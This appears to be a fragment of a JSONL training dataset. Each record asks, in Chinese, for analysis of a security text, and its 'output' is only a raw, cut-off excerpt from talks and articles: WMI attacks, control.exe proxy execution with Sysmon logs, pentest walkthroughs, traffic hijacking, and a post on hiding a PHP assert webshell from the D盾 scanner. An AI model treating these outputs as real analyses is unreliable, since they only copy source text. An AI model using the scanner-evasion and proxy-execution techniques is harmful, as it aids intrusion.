. . . . . . . . . . . . . . . . . 12 6 Smart-Contract 12 6.1 Pre-Loader . . . . . . . . . . . . .", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGoogle Toolbar: The NARC Within The Google What would we do without them/it? Google Toolbar: The NARC Within The problem: URLS are the geek tool? URLs, URLs everywhere... Home, work, on the go? Google Toolbar: The NARC Within Google Toolbar is the Solution? Google Toolbar: The NARC Within Or just a tease? Google Toolbar: The NARC Within Of course it's good, it's free! Google Toolbar: The NARC Within Installs easy.. Stores URLS.. Access them wherever, whenever you need it No more lost URLS! Happy! Google Toolbar: The NARC Within Time passes.... You bookmark your discoveries Happy! Google Toolbar: The NARC Within bookmark any pr0n? Google Toolbar: The NARC Within Next day at work... You log in to google and of course use the toolbar with all your handy bookmarked urls. Corporate Security You probably have a corporate security department? They probably watch you? Corporate Security Maybe they watch you closely? Web proxies? Web filtering? Web reporting? Toolbar Traffic What happens when you access the toolbar? Lets untangle... Demonstration What we saw For every url, google attempts a hit to the favicon.gif or favicon.ico url So? Corporate Security Remember they watch you? Top 10 porn viewers now likely includes you? Even though you didn't do anything. Forensics When they investigate you what will they see? Bluecoat Bluecoat one liner to watch traffic in realtime: wget --user=admin --password=supersecret --no-check-certificate -O - -q https://10.1.1.1:8082/Accesslog/tail-f//Access-Log Pipe it through grep to narrow the target | grep \"10.2.2.2\" | grep favicon Forensics index.dat files? Nope..the toolbar generated the traffic, not IE. Workarounds Firefox Plugins to the rescue?: Places pack from Andy Halford: SyncPlaces: https://addons.mozilla.org/en-US/firefox/addon/8426/ CheckPlaces: https://addons.mozilla.org/en-US/firefox/addon/10897/ SortPlaces: https://addons.mozilla.org/en-US/firefox/addon/9275/ WebDav or file=rsync favicon.ico? Stored in the .json file generated b", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1218-002-win-签名的二进制代理执行控制面板 ## 来自ATT&CK的描述 攻击者可能滥用control.exe代理恶意负载的执行 Windows控制面板进程二进制文件control.exe处理控制面板项的执行控制面板项是使用户可以查看和调整计算机设置的实用程序 控制面板项目是注册的可执行文件.exe或控制面板.cpl文件后者实际上是重命名的动态链接库.dll文件它们导出CPlApplet函数为了易于使用控制面板项通常包括在注册并加载到控制面板中后可供用户使用的图形菜单可以从命令行直接执行控制面板项目可以通过应用程序编程接口API调用以编程方式执行也可以直接双击文件来执行 恶意控制面板项目可以通过网络钓鱼活动传递也可以作为多阶段恶意软件的一部分执行控制面板项目尤其是CPL文件也可能会绕过应用程序或文件扩展名允许列表 攻击者还可能使用控制面板文件扩展名.cpl重命名恶意DLL文件.dll并将其注册到HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Control Panel\\Cpls即使这些注册的DLL不符合CPL文件规范并且不导出CPlApplet函数在执行控制面板时也会通过其DllEntryPoint加载并执行它们不导出CPlApplet的CPL文件不能直接执行 ## 测试案例 Control.exe是微软Windows操作系统自带的程序用于访问控制面板这不是纯粹的系统程序但是如果终止它可能会导致不可知的问题 暂无测试案例 ## 检测日志 windows security windows sysmon ## 测试复现 ``` C:\\Users\\zhuli>control.exe C:\\Users\\zhuli\\Desktop\\TevoraAutomatedRTGui\\atomic-red-team-master\\atomics\\T1218.002\\bin\\calc.cpl ``` 执行成功 ## 测试留痕 Windows Sysmon记录 ``` 日志名称: Microsoft-Windows-Sysmon/Operational 来源: Microsoft-Windows-Sysmon 日期: 2022/1/9 21:05:44 事件 ID: 1 任务类别: Process Create (rule: ProcessCreate) 级别: 信息 关键字: 用户: SYSTEM 计算机: zhuli.qax.com 描述: Process Create: RuleName: technique_id=T1218.002,technique_name=rundll32.exe UtcTime: 2022-01-09 13:05:44.050 ProcessGuid: {78c84c47-dda8-61da-4e09-000000000800} ProcessId: 6288 Image: C:\\Windows\\SysWOW64\\rundll32.exe FileVersion: 10.0.17763.1 (WinBuild.160101.0800) Description: Windows host process (Rundll32) Product: Microsoft Windows Operating System Company: Microsoft Corporation OriginalFileName: RUNDLL32.EXE CommandLine: \"C:\\Windows\\SysWOW64\\rundll32.exe\" \"C:\\Windows\\SysWOW64\\shell32.dll\",#44 C:\\Users\\zhuli\\Desktop\\TevoraAutomatedRTGui\\atomic-red-team-master\\atomics\\T1218.002\\bin\\calc.cpl CurrentDirectory: C:\\Users\\zhuli\\ User: QAX\\zhuli LogonGuid: {78c84c47-3b57-61d8-525f-090000000000} LogonId: 0x95F52 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 实用性 WEB 开发人员安全须知 ### 目标读者 安全问题主要由以下两类原因导致 1. 那些刚入门的无法区分 MD5 和 bcrypt 作用的开发者 2. 那些知道这件事但忘记/忽略了的开发者 我们的详细说明应该可以帮到第 1 类开发者而我们希望我们的 checklist 可以帮到第 2 类的开发者构建更多的安全系统这并不是一个综合性的全面指南只是覆盖了大多数我们在过去发现的常见问题 ### 目录 1. [安全Checklist](security-checklist-zh.md) 2. 什么东西会出问题? 3. 安全地传输数据: HTTPS 详解 4. 权限验证: 我是谁 4.1 基于表单的权限验证 4.2 基础鉴权 4.3 一次是不够的二次三次验证.... 4.4 为什么使用不安全的文本消息? HOTP & TOTP 介绍 4.5 处理密码重置 5. 权限验证: 我能做什么 5.1 基于 Token 的权限验证 5.2 OAuth 和 OAuth2 5.3 JWTJSON Web Token 6. 数据校验和过滤: 绝不信任用户输入 6.1 校验和过滤用户输入 6.2 过滤输出 6.3 跨站脚本攻击XSS 6.4 注入攻击 6.5 用户上传 6.6 用户篡改输入 7. 纯文本 != 编码 != 加密 != 哈希 7.1 通用编码模式 7.2 加密 7.3 哈希和单向函数功能 7.4 哈希速度对照表 8. 密码: dadada123456cute@123 8.1 密码策略 8.2 密码存储 8.3 没有密码的生活 9. 公钥加密 10. 会话: 请记住我 10.1 哪里存储状态 10.2 使会话失效 10.3 Cookie 怪物和你 11. 加固安全, 一次只有一个头信息 11.1 安全的 web header 11.2 第三方代码的数据集成检测 11.3 证书绑定 12. 配置错误 12.1 云上准备: 端口ShodanAWS 12.2 亲你开了 debug 模式 12.3 日志或者没有日志 12.4 监控 12.5 最低优先级原理 12.6 请求频率限制 和 Captchas 12.7 把项目的密钥和密码保存在文件上 12.8 DNS: 关于子域名和被遗忘的宠物计划 12.9 打补丁和更新 13. 攻击: 当坏人来临 13.1 点击劫持 13.2 跨站请求伪造 13.3 拒绝服务 13.4 服务端请求伪造 14. [互联网公司漏洞统计](vulnerabilities-stats-zh.md) 15. 重造轮子但做出来是方的 15.1 Python 的安全库和包 15.2 NodeJS 的安全库和包 15.3 学习资料 16. 掌握良好的安全习惯 17. 安全性 vs 可用性 18. 回到第 1 条: 安全 Checklist 解释 ### 我们是谁? 我们是全栈开发工程师讨厌看到那些所谓为了做某件事情而 hack但写了一堆不安全代码的开发者在过去六个月我们保护了超过 1500w 信用卡信息不被泄露超过 4500w 的用户个人信息不被盗取潜在的拯救了大量公司的倒闭最近我们发现的一个安全问题可以导致一家比特币交易公司因数据泄露而倒闭我们帮助了若干创业公司让他们的系统更安全大多数都是免费的有时候甚至连谢谢都没收到 :) *如果你不同意我们的观点或者找到 bug请开启一个 issue 或者提交一个 PR 给我们另外你也可以通过 hello@fallible.co 与我们交流*", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHack Like the Movie Stars: A Big-Screen Multi-Touch Network Monitor George Louthan & Cody Pollet & John Hale Computer Science / www.isec.utulsa.edu Overview  Multi-touch interfaces  What is multi-touch?  This rhetorical question will not be dignified with a response.  Optical multi-touch methods  Our big board  History, building process  Other uses  The tool: DVNE  Architecture  Future plans Computer Science / www.isec.utulsa.edu Multi-touch Methods  Electronic  Capacitive (iPhone)  Hard to build at home  Optical  Main idea: capture infrared blobs with a camera Computer Science / www.isec.utulsa.edu Optical Multi-touch  The question: how to illuminate the touches?  Rear Diffused Illumination  Example: Microsoft Surface  IR shines out of the screen, illuminating objects Computer Science / www.isec.utulsa.edu Optical Multi-touch  Frustrated Total Internal Reflection  Shine light into the edges of plexiglass  Touching the glass causes it to flex and emit light  This is what we use Computer Science / www.isec.utulsa.edu Our big screen  AKA That Thing I Keep Tripping Over  FTIR method  56 diagonal, 16:9 aspect ratio (roughly 48x30)  1280 x 800  Plexiglass construction  Laminated vellum projection screen  168 IR LEDs  PlayStation Eye camera Computer Science / www.isec.utulsa.edu Our big screen Computer Science / www.isec.utulsa.edu Architecture  Touch signals over UDP  TUIO Protocol Computer Science / www.isec.utulsa.edu What do we DO with it?  Some ongoing projects  Immersive collaboration (multi-touch caves)  Educational software (we're building tables for schools)  But we're a security lab  We also like campy movies. (It's a UNIX system!) Computer Science / www.isec.utulsa.edu We also play games ... Computer Science / www.isec.utulsa.edu DVNE  Dynamic Visualization for Network Environments  Primary goal: to build a flashy Hollywood-style computer interface  Secondary goal: build something useful for looking at networks  Network monitor  Track TCP streams, identify proto", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nKNOCK? KNOCK? WHOIS THERE? APT ATTRIBUTION AND DNS PROFILING Frankie Li ranerwang@gmail.com Twitter: @espionageware  APT Attribution: Who wrote these codes?  Tactics, Techniques and Procedures (TTP)  Behavior of APT adversary  HUMINT extracted from DNS  Gather intelligence from open source (aka OSINT)  Dynamically monitoring of PassiveDNS è PassiveWhois  Analysis by visualization tool (Maltego)  Tools and demo AGENDA  From a place in China, but not so China ;)  Sunday researcher in malware analysis and digital forensics  Part time lecturer  A Lazy blogger (espionageware.blogspot.com)  NOT associated with PLA 61398 or Mandiant  NOT associated with PLA 61486 or CrowdStrike or Taia Global or ThreatConnect WHO AM I? APT ATTRIBUTION  Disclaimer: Not going to provide any opinion on the latest indictment or 奶黄包 or 楼主 or 上海钟楼  http://espionageware.blogspot.com or Twitter: @espionageware  Not a concern for private sector, but for LE or intelligence agencies  Not difficult, if you have source code  Not hard, if you focus only on strings & human readable data within a malware program  But, to attribute responsibility with Certainty is almost impossible, unless they make a mistake APT ATTRIBUTION  Source code attribution  Attributes of Windows binaries  Attribution malware  Attribution of APT by digital DNA WHO WROTE THESE CODES?  Stylometry, the application of attribute the authorship by coding style  Kind of profiling by writing style  Comments and coding crumbs  JStylo: By comparing unknowns documents with a known candidate authors document*  Not a solution because most APT samples collected are compiled binaries SOURCE CODE ATTRIBUTION *Islam, A. (2013). Poster: Source Code Authorship Attribution  PE headers are des-constructed and metadata (artifacts) are categorized (Yonts, 2012)  Extract the technical and contextual attributes or genes from different layers to group the malware (Xecure-Lab, 2012 and Pfeffer, 2012)  By a proprietary reverse engineering and behavioral anal", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n一种 UTF-8 编码中文变量过 D 盾的方法 大家好我是菜菜 reborn起因是今天在复习 PHP 代码基础从基 本的变量开始复习起发现 PHP 变量原来支持中文然后想起大佬 们都会做免杀心血来潮想试试中文变量是否可以免杀 第一种 第二种 然后我就写了两个简单的 assert 的这种马当然高版本不支持 assert 了 第一种是一开始我写的然后我刚写完是不免杀的4 级 D 盾我转 成 UTF-8 的编码后D 盾就杀不到了 具体转的方式是用 notepad++转的 第二种我刚写的时候 D 盾是 1 级 然后转 UTF-8 后也是杀不到了我不是很懂这里面的编码原理但是 确实是过了下载的新版 D 盾所以把发现的这个方法分享给大家", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCSCS: 以技術力協助公民社會 的初次嘗試 Pellaeon Lin @ HITCON CMT 2017 pellaeon@ocf.tw Human rights defenders are the canaries in the mine of digital rights violations and cyber attacks Human rights defenders? - 生命權財產權獲公平審判權 - 免於酷刑和奴役 - 人身思想宗教言論自由 - 性傾向與認同 - 網際網路通訊 NGO 技術社群 Civil Society Cyber Shield NGO 面臨的資安威脅 - 釣魚追蹤廣告政府竊聽翻牆 - 其實和企業所面臨的威脅類似 - 容易成為優先被攻擊的對象 - 又欠缺自我保護的資源 CSCS Workshop 5/24-25 - 台灣民主基金會 - HITCON台權會華人民主書院 - 11 國50 位參與者 - 教學小組問答討論短講 Lessons Learned CSCS Workshop 檢討 - 其實大部分人需要的是最基本的東西 - 問答很重要 - 人與人的連結和信任很重要 - 慢慢來快不得 NGO 資安討論小聚 #1 8/16 - 台灣本地參與者 @ OCF 辦公室 - 小規模 - 問問題 - 討論 - 認識朋友 Lessons Learned NGO 資安討論小聚 檢討 - NGO 社群比較注重人與人之間的認識 - 其實有興趣的技術人很多 - 不同背景的人的平衡 - 設定規則必須要說明簡稱和專有名詞 NGO 資安討論小聚 檢討 - 避免永無止境討論極端狀況和極端防護手 法 - 永遠要把風險和成本納入考量 沒有來的人呢 更基本的問題 下一步資安教材入口網 - 協作 Wiki - 彙整各種教材簡短介紹 - 翻譯 - 分類帽 - 選擇需求建議教材 數位權利倡議 未來 新世代的網路挑戰 re-decentralization walled gardens 隱私權數位權利 網路治理 APRIGF July/August 2018, Vanuatu 數位權利 RightsCon 5/16~18, 2018, Toronto, Canada 駭客文化/資安/藝術/電腦與社會 34C3 Chaos Communication Congress December 2017, Leipzig, Germany 數位權利/反內容審查及監控 Internet Freedom Festival March 2018, Valencia, Spain NGO 資安討論小聚 #2 9/19 Tue. 台灣人權促進會辦公室 民權西路站 http://bit.ly/2wDaFJJ Q & A", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nsdk 0x00 0x01 0x02 1 is_root:true 2 1 2 0x03 0x04 3root  4 xposed008krealtoolsubstrate007FakeGpsmockgps IMEI IMSIMTKNZT 5VPN /* * * */ private boolean isWifiProxy(Context context) { // 4.0 final boolean IS_ICS_OR_LATER = Build.VERSION.SDK_INT >= Build.VERSION_CODES.ICE_CREAM_SANDWICH; String proxyAddress; int proxyPort; if (IS_ICS_OR_LATER) { proxyAddress = System.getProperty(\"http.proxyHost\"); String portStr = System.getProperty(\"http.proxyPort\"); proxyPort = Integer.parseInt((portStr != null ? portStr : \"-1\")); } else { proxyAddress = android.net.Proxy.getHost(context); proxyPort = android.net.Proxy.getPort(context); } return (!TextUtils.isEmpty(proxyAddress)) && (proxyPort != -1); } 0x05", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCopyright 2016, blackfort security all rights reserved. Malware is In the Memory Real Time Malware Memory Analysis System 2016 HITCON YoungJin Sim / BLACKFORT Security / Senior Researcher <jine@blackfortsec.com> YoungHak Lee / BLACKFORT Security / Senior Researcher <vstherock@blackfortsec.com> Who we are  Copyright 2016, blackfort security all rights reserved. http://www.blackfortsec.com YoungJin Sim YoungHak Lee New malware per day Reference: http://www.redsocks.nl/blog-2/malware-statistics-march-2016/ - Per day average 425,531! - Researcher Analysis time average 1 hour - 1day working hours 8 hours - 425,531 / 8 = 53,191  Copyright 2016, blackfort security all rights reserved. http://www.blackfortsec.com Cuckoo Sandbox - Malware Automatic Analysis System - Windows, OSX, Linux, Android Supported - Trace API Calls(User Level API Hooking) - Cuckoo Monitor.dll - Rootkit Analysis is impossible (example: Zero access) - Vulnerable to Anti-VM (example: Citadel)  Copyright 2016, blackfort security all rights reserved. http://www.blackfortsec.com - Reference: http://docs.cuckoosandbox.org/en/latest/introduction/what/#architecture Why Memory Analysis? - All Programs are loaded in memory - Malware Protector Bypass(packing, anti-debug) - Advanced malware operates solely in memory - Identifies system activity and overall machine state - Memory reliability is very important - Example: Memory Analysis, Drakvuf, Memminer  Copyright 2016, blackfort security all rights reserved. http://www.blackfortsec.com - Black Hat USA 2014 Arsenal Release - Cuckoo Sandbox Dependencies - Interval-based memory dump - Too many dumps are inefficient in analysis, time and disk space wise - Trigger-based memory dump - API which has not been hooked cannot be analyzed Memory Analysis Interval-base Memory dump Trigger-based Memory dump  Copyright 2016, blackfort security all rights reserved. http://www.blackfortsec.com - Reference:https://github.com/djteller/MemoryAnalysis Drakvuf - 2014 Hacktivity Releas", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Patches' Punches Reversing, 50 points ## Description > That moment when you go for a body slam and you realize you jump too far. Adjust your aim, and you'll crush this challenge! A binary file was attached. ## Solution Let's run the file: ```console root@kali:/media/sf_CTFs/sunshine/Patches_Punches# ./patches Woah there! you jumped over the flag. ``` Not much there. If we jumped over the flag though, it might be available via `strings`: ```console root@kali:/media/sf_CTFs/sunshine/Patches_Punches# strings patches ... Hurray the flag is %s Woah there! you jumped over the flag. ;*2$\" zyq|Xu3Px~_{Uo}TmfUq2E3piVtJ2nf!} ... ``` The flag seems encrypted, but there is hope - There's a string that hints that it is supposed to print the flag. Let's open the binary with Ghidra. The decompilation of main shows: ```c /* WARNING: Removing unreachable block (ram,0x00010546) */ /* WARNING: Removing unreachable block (ram,0x00010580) */ /* WARNING: Removing unreachable block (ram,0x0001054f) */ /* WARNING: Removing unreachable block (ram,0x00010586) */ undefined4 main(undefined1 param_1) { int iVar1; iVar1 = __x86.get_pc_thunk.ax(); printf((char *)(iVar1 + 0x134)); return 0; } ``` There's not much to work with here. However, the disassembly is much longer than what we are seeing (pasted from `radare2` since it supports text mode): ``` [0x0000051d]> VV @ main (nodes 7 edges 8 zoom 100%) BB-NORM mouse:canvas-y mov-speed:5 .-----------------------------------------------. | 0x51d | | (fcn) main 169 | | main (int argc, char **argv, char **envp); | | ; var unsigned int local_10h @ ebp-0x10 | | ; var signed int local_ch @ ebp-0xc | | ; var int local_8h @ ebp-0x8 | | ; arg int arg_4h @ esp+0x4 | | lea ecx, [arg_4h] | | and esp, 0xfffffff0 | | push dword [ecx - 4] | | push ebp | | mov ebp, esp | | push ebx | | push ecx | | sub esp, 0x10 | | call sym.__x86.get_pc_thunk.ax;[ga] | | add eax, 0x1aa4 | | mov dword [local_10h], 1 | | cmp dword [local_10h], 0 | | jne 0x5a3;[gb] | `-------------", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 关于流量劫持问题 对流量劫持问题的一些整理如侵权请联系删除(  ω  )y 从攻击面上来讲流量劫持大概可以分为两个部分本地劫持 和 网络劫持本篇笔记在整理的过程中也是按照这种方式其中本地劫持后面的几种方式都可以归纳为网络劫持即离开用户主机后穿行于各个路由网关节点时所遭遇的劫持问题 ## 0. 本地劫持 ### 定义 常使用流氓软件的方式安装在用户的客户端与木马的行为本质无异主页锁定网页劫持广告弹窗流量暗刷静默安装 ### 案例 - 通过浏览器插件进行流量劫持的QTV系列变种[5] ![](https://image-host-toky.oss-cn-shanghai.aliyuncs.com/20200330124309.png)  图注入方式的劫持流程图 - 高清影视流氓病毒案例 ![](https://image-host-toky.oss-cn-shanghai.aliyuncs.com/20200330124523.png)  图流氓软件方式的劫持流程图 - 广告弹窗挂马 > 原本的广告流量被注入了网页木马以广告弹窗等形式在客户端触发这属于一种变相的流量劫持更确切的说应该称之为流量污染或流量投毒[5] ## 1. DNS劫持 ### 定义 > DNS劫持是你想去机场的时候把你给丢到火车站 ### 攻击方法 > **1.本机DNS劫持** > > 攻击者通过某些手段使用户的计算机感染上木马病毒或者恶意软件之后恶意修改本地DNS配置比如修改本地hosts文件缓存等 > > **2. 路由DNS劫持** > > 很多用户默认路由器的默认密码攻击者可以侵入到路由管理员账号中修改路由器的默认配置 > > **3.攻击DNS服务器** > > 直接攻击DNS服务器例如对DNS服务器进行DDOS攻击可以是DNS服务器宕机出现异常请求还可以利用某些手段感染dns服务器的缓存使给用户返回来的是恶意的ip地址 > > 作者Luxm > 链接https://juejin.im/post/5cff858a6fb9a07ed84238ec > 来源掘金 > 著作权归作者所有商业转载请联系作者获得授权非商业转载请注明出处 ### 防护手段 > **1.加强本地计算机病毒检查开启防火墙等防止恶意软件木马病毒感染计算机** > > **2.改变路由器默认密码防止攻击者修改路由器的DNS配置指向恶意的DNS服务器** > > **3.企业的话可以准备两个以上的域名一旦一个域名挂掉还可以使用另一个** > > **4.用HTTP DNS 代替 Local DNS** > > > 作者Luxm > 链接https://juejin.im/post/5cff858a6fb9a07ed84238ec > 来源掘金 > 著作权归作者所有商业转载请联系作者获得授权非商业转载请注明出处 ## 2. HTTP劫持 ### 定义 > HTTP劫持是你去机场途中有人给你塞小广告 ## 3. 证书劫持 HTTPS劫持长以中间人攻击的形式存在 比如去年哈萨克斯坦政府实施的电信级HTTPS劫持过程中就是哈政府要求公民安装 ## 4. 链路劫持 链路Data Link劫持 ### 定义 > TCP链路劫持其实就是指网络链路上侦听伪造TCP包达到控制目标网络链路的行为最常见的就是某些设备实现的对非法站点的访问拦截以及一些地区运营商的网页植入广告行为 ![](https://image-host-toky.oss-cn-shanghai.aliyuncs.com/20200330123718.png) ### 判断方法 1. 应用层e.g. BurpSuite抓包观察返回包的信息受否有返回包的痕迹 2. 网络层e.g. WireShark抓包分析HTTP/HTTPS的响应包是否有异常的 3. 分析HTTPHTTPS包的TTL值 - 在使用HTTPS的网站中一般来说在时间接近的情况下连接相同的目标IP数据包在链路上的路径是是近似的相差在23左右 - 可以根据时间排序寻找TTL显著大的包如果存在明显异常TTL的包可以初步确定存在链路劫持 4. 分析包内容的Identification字段是否存在异常 - 该字段主要用于[IP分片](https://blog.csdn.net/m0_37962600/article/details/80039349) [3] - 数据链路层具有最大传输单元MTU这个特性它限制了数据帧fragment的最大长度因此通常要传输的IP报文大小超过最大传输单位MTU时就会产生IP分片的情况IP分片经常发生在网络环境中 - IP首部包含的分片重组信息`| Identification |R|DF|MF| Fragment Offset |` - 注意其中的Ide", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCopyright2017 Nippon Telegraph and Telephone Corporation Cybersecurity Talent Development in NTT Group Takehiro Ozaki, NTT-CERT Mitsuhiro Hatada, NTT Com-SIRT Copyright2017 Nippon Telegraph and Telephone Corporation About us l Takehiro Ozaki l NTT Secure Platform Laboratories lSenior Research Engineer of NTT-CERT l NTT Group Certified Security Professional l Mitsuhiro Hatada l NTT Communications Corporation lCybersecurity, Technology Development Department l& Tokyo 2020 Taskforce l& NTT Com-SIRT l NTT Group Certified Security Principal l Ph.D. student l MWS organizer lhttp://www.iwsec.org/mws/2017/ - 1 - Copyright2017 Nippon Telegraph and Telephone Corporation Agenda l Security Certification Program in NTT Group l Overview of NTT Group l Security certification program l Technical activity l Keys to success l NTT Com Cyber Range l Overview l Scenario Development l Training cases l Lessons learned - 2 - NTT秘 (情報管理区分Ｂランク) Copyright2017 Nippon Telegraph and Telephone Corporation SECURITY CERTIFICATION PROGRAM IN NTT GROUP - 3 - Copyright2017 Nippon Telegraph and Telephone Corporation Diagram of NTT Affiliate Groups - 4 - Other Group Company Long Distance and International Communications Data Communications Others Regional Communications Mobile Communications R&D August 2016 Started business Security http://www.ntt.co.jp/gnavi_e/index.html Copyright2017 Nippon Telegraph and Telephone Corporation CISO and CISO Committee - 5 - Other Group Company Long Distance and International Communications Data Communications Others Regional Communications Mobile Communications Security CISO CISO CISO CISO CISO CISO R&D CISO Group CISO Committee Appointed CISO each group company and established the Group CISO Committee in 2015. Promote security information sharing among group companies. Strengthen security operation and cybersecurity talent development. Copyright2017 Nippon Telegraph and Telephone Corporation Situation of Cybersecurity A Few Years Ago  l In the world: l Cyber threats be", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# digitalworld.local: snakeoil > https://download.vulnhub.com/digitalworld/SNAKEOIL.7z 靶场IP`192.168.32.204` 扫描对外端口服务 ``` (rootkali)-[/tmp] # nmap -p 1-65535 -sV 192.168.32.204 Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-06 00:04 EDT Nmap scan report for 192.168.32.204 Host is up (0.00090s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 80/tcp open http nginx 1.14.2 8080/tcp open http nginx 1.14.2 MAC Address: 00:0C:29:89:70:64 (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.17 seconds ``` 访问80端口 ![image-20220906120504561](../../.gitbook/assets/image-20220906120504561.png) 访问8080端口 ![image-20220906120542811](../../.gitbook/assets/image-20220906120542811.png) 爆破web目录 ``` (rootkali)-[/tmp] # ffuf -u http://192.168.32.204:8080/FUZZ -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -ic -c -e .php,.html -mc all -fc 403,404 -fl 45,47,51 /'___\\ /'___\\ /'___\\ /\\ \\__/ /\\ \\__/ __ __ /\\ \\__/ \\ \\ ,__\\\\ \\ ,__\\/\\ \\/\\ \\ \\ \\ ,__\\ \\ \\ \\_/ \\ \\ \\_/\\ \\ \\_\\ \\ \\ \\ \\_/ \\ \\_\\ \\ \\_\\ \\ \\____/ \\ \\_\\ \\/_/ \\/_/ \\/___/ \\/_/ v1.5.0 Kali Exclusive <3 ________________________________________________ :: Method : GET :: URL : http://192.168.32.204:8080/FUZZ :: Wordlist : FUZZ: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt :: Extensions : .php .html :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: all :: Filter : Response status: 403,404 :: Filter : Response lines: 45,47,51 ________________________________________________ [Status: 200, Size: 2882, Words: 598, Lines: 71, Duration: 36ms] login [Status: 405, Size: 64, Words: 10, Lines: 2, Duration: 57ms] users [Status: 200, Size: 140, Words: 5, Lines: 2, Duration: 56ms] registration [Status: 200, ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRaspberry)MoCA) A)recipe)for)compromise) Andrew Hunt George Mason University ahunt5@gmu.edu Media over Coaxial Alliance  8))12)large)companies)  How)to)make)use)of)widely)deployed)coaxial)cabling)to)deliver) content?)  Shielded)  Lots)of)frequency)bandwidth)  Carries)signal)500)feet)  PHY/MAC)specificaLon)  Creates)a)network)of)the)coaxial)bus)  Delivers)guaranteed)bandwidths)at)certain)distances) What does MoCA look like? MoCA Operation: PHY  PHY is the coaxial cable  Frequencies & signaling)  Orthogonal Frequency Division Multiplexing)  WAN and LAN channel sets) MoCA Operation: MAC  Media)Access)Control)  Scheduled)frames))  Master)node)controller)  Time)Division)MulLple)Access)  Assured)speeds) PHY$Rate$) (Mbps)) Minimum$MAC$) Rate$(Mbps)) 275) 139.87) 250) 130.78) 225) 119.45) 200) 107.74) 175) 95.64) 150) 81.98) 125) 68.32) 100) 54.65) 75) 39.82) MoCA, definitely caffeinated  Enables)triple)play)  Desired)by)ISPs)  HDTV)requirements)  Guaranteed)speeds) More prevalent than Starbucks  Most)consumers)dont)even)know)they)have)it)  North)American)and)European)service)providers)already) deploy)it)  In)other)words,)just)about)every)broadband)installaLon)  FIOS)  Cable/Xfinity)  Dish/Satellite)  DVR)  STB) The Wall Wart  OpLcal)cable)run)from)the)neighborhood)splicer)to)the)home)  OpLcal)Network)Terminator)(ONT))installed)on)the)exterior)of) the)home)  Bridges)the)fiber)to)coaxial)or)CAT5)cable)  ISP)prefers)coaxial)!)MoCA) MoCA Inside  AcLontec)Router)  SPI)firewall)  NAT)router)  LAN)f)WAN)  2)MoCA)nodes)(NC))  MoCAftofEthernet)bridge)  Digital)Video)Recorder)  MoCA)networking)on)board)  Depends)on)AcLontec)router)  Time)sync)  TV)channel)data) Lets draw that out a little more No Keys Required OH SNAP! TAKE$IT$ ALL$ Remember, MoCA looks like this? DOUBLE SNAP! ITS OUTSIDE! ATTACK$HERE$ Walk up and jack in  ULlity)pointfoffpresence)  ONT)+)root)coax)splicer)+)power) =)SCORE!)  Many)homes)have)low)plants) growing)around)to)obscure)the) equipment)  That)will)provide)useful", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Copyright  2015, FireEye, Inc. All rights reserved. Copyright  2015, FireEye, Inc. All rights reserved. WhyMI so Sexy? WMI Attacks, Real-Time Defense, and Advanced Forensic Analysis Willi Ballenthin, Matt Graeber, Claudiu Teodorescu DEF CON 23 2 Copyright  2015, FireEye, Inc. All rights reserved. Copyright  2015, FireEye, Inc. All rights reserved. This talk is dedicated to hunting down APT 29 3 Copyright  2015, FireEye, Inc. All rights reserved. So youve been owned with WMI Attackers use WMI - reality Prevention, detection, remediation guidance - lacking Forensic capability - non-existent Awareness of offensive capabilities  lacking Awareness of defensive capabilities  practically non-existent 4 Copyright  2015, FireEye, Inc. All rights reserved. Copyright  2015, FireEye, Inc. All rights reserved. Introduction Willi, Matt, and Claudiu 5 Copyright  2015, FireEye, Inc. All rights reserved. About the Speakers Willi Ballenthin - @williballenthin Reverse Engineer @ FireEye Labs Advanced Reverse Engineering (FLARE) Team Forensic Analyst Researcher Instructor 6 Copyright  2015, FireEye, Inc. All rights reserved. About the Speakers Matt Graeber - @mattifestation Reverse Engineer @ FireEye Labs Advanced 